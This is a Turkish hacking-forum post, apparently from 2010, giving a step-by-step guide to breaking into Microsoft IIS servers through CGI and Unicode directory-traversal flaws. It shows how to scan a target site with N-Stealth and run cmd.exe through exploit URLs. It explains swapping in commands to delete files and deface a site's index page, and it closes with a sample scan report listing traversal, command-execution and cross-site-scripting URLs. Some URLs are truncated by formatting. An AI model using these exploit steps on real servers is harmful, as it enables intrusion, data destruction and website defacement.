Dünyada en çok kullanılan iki hack yolu

4nqryx

Yeni üye
20 May 2010
5
0
bodrm kaTı
Efsanelerden..


Cgi ve Uni Cod Açiklarindan en iyi Seklilde Faydalanmak için Scanner’inizin iyi Olmasi Gerek.

Yoksa Piyasada Bir çok cgi scan var, Zamaninda Hepside çok iyi di. Veritabanlarını Güncelleştirmeyen Scannerlar yeni açıklar karşında hiçte etkili olmayacaktır.


ve Açik Olmadigi Halde Basit Bir Logi Sayfasi Hakkinda açik var diye uyari Veriyorlar.


Tüm


Su An Piyasadaki En iyi Cgi Sanner N-Stealth (iP Portal Download Bölümden indirebilirsiniz)


Program Güzel Oldugu Kadar Türkçe Dil Destegininde Bulunmasi Arti Bir Özellik.


Simdi Adim Adim Bir Sisteme UniCod Açiklari Sayesinde Sizmayi Görecegiz.


Programi Kurduktan Sonra Dil Seçenekleri Çikacak Karsiniza Ordan Türkçeyi Seçin



Sunucu iP Adresi : Buraya Saldiracagimiz Hedef Sitenin ip Adresini Yaziyoruz.


(ip Adresini ögrenmek için siteye ping atin yeter c:>ping -t gibi illegalport.com ip adresi 66.111.48.66 )


ip Adresini Yazdiktan Sonra Tara Tusuna tiklamaniz yada Enter’a Basmaniz Yeterli.


Baglanti Hiziniza Bagli Olarak islem Biraz Sürecektir. (öneri olarak: önce Local Network’ünüzde Deneyebilirsiniz.


Tabiki Networkünüzdeki (Saldiracaginiz Makinada) Web Server Kurulu Olmali.


Bu Sekilde Sistemin isleyisini çok daha hizli görebilirsiniz.)


N-Stealth Bir Açik Buldugu Anda üstteki Gibi Muhtemel Yazlim Hatasi Bulundu diye bir uyari verecektir.


Hemen Sag Taraftaki Yeri Butonuna Tiklayarak Açigi Görebilirsiniz. Ama En iyisi Sonuna Kadar Beklemek.




Tarama Islemi Bittiginde Sistem Otomatik Olarak Size Html Formatinda Rapor Olusturacaktir.


Bu Raporun örnegini asagida görebilirsiniz.


Raporu html olarak Kaydedin.


Rapor Türkçedir ve Sistemdeki Açiklari, Risk Seviyelerini Size Gösterecektir.


ve html dosyasindan Direkt Çalistirabilmeniz için Hazir Linkler Olusturacaktir.




html olarak internet Explorer’dan oldugu gibi. Direk Program üzerinden de


bu açiklari Açik Butonuna Tiklayarak çalistirabilirsiniz.





Simdi En Can Alici Nokta : color=#000000http://10.0.0.8/msadc/..%c0%af..%c0%...../winnt/syste m32/cmd.exe?/c+dir+c:

(Bu Açiga Ait Bir Link)

Link in Sonunda +dir+c: bölümü var bütün is burda. dir yazan yere cdm.exe nin çalistirdigi tüm komutlari yazabilirsiniz.


Mesela Dizin Olusturmak için +md+c:dizinAdi


Dosya Silmek için +del+c:dosya adi


Diznler Arasi Geçis için Bildigimiz cd Komutunu kullanabiliriz +cd+c:Inetpubwwroot


wwroot a ulastikdan sonra index.htm - index.asp ye istediginizi yapin.


iste Örnek Bir N-Stealth Raporu


Default Kurulan Tüm IIS’lerde Bu Açiklar Var.


Raporda Risk Seviyeleri Belirtilmistir.



Rapor


Rapor XXXX (1X0.X0.0.XX

Tarih: 02.03.2003 19:04:14

Tarama kurallari: Normal


10.0.0.8

Sunumcu adi: XXXXX
Port: 80
Sunumcu: Microsoft-IIS/5.0

Sunumcu CGI aciklarina sahip olabilir. 160 item(s)


Special Request

Risk seviyesi: Alcak
Yeri: color=#000000http://10.0.0.8/%3cscript%3ealert’Can%20Cross%20Site% 20Attack’%3c/SCRIPT%3e.shtml
Cross-Site Scripting Vulnerability.


BLABLA Test

Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/blabla.idq SANS/FBI Top 20*

Possible Vulnerable ISAPI Extension




Special Request

Risk seviyesi: Orta
Yeri: color=#000000http://10.0.0.8/null.htw?CiWebHitsFi...obal.asa%20&Ci Restriction=none&CiHiliteType=Full
Common Vulnerability/Exposure.


Special Request

Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%5c..%5c...255c..%5cwin nt/system32/cmd.exe?/c+dir
IIS CGI Decode Vulnerability.


Special Request

Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/scripts/..%2f..%.....%2f..%2f. .%2f..%2fwinnt/system32/cmd.exe?/c+dir
IIS CGI Decode Vulnerability.


Special Request

MS IIS/PWS Escaped Characters Decoding Command Execution

CVE: CAN-2001-0333

Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/scripts/..%5c..%...stem32/cmd.exe ?/c+dir+c: BugTraq ID: 2708

Directory traversal vulnerability in IIS 5.0 and earlier allows remote attackers to execute arbitrary commands by encoding .. (dot dot) and characters twice.




Special Request

Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%2f..%2f...252fwinnt/syst em32/cmd.exe?/c+dir+c:
IIS Unicode Vulnerability.



Special Request

MS IIS/PWS Escaped Characters Decoding Command Execution

CVE: CAN-2001-0333

Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%5c../..%2...55c../winnt/sy stem32/cmd.exe?/c+dir+c: BugTraq ID: 2708

IIS Unicode Vulnerability.



Special Request

Risk seviyesi: Yuksek
Yeri: color=#000000http://10.0.0.8/msadc/..%c0%af..%c0%...../winnt/syste m32/cmd.exe?/c+dir+c:
IIS Unicode Vulnerability.

Not: Verildiyse sorry. Bnde duruyodu blki sizlere yararlı olur diye paylaşim istedm umarm işinize yarar.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.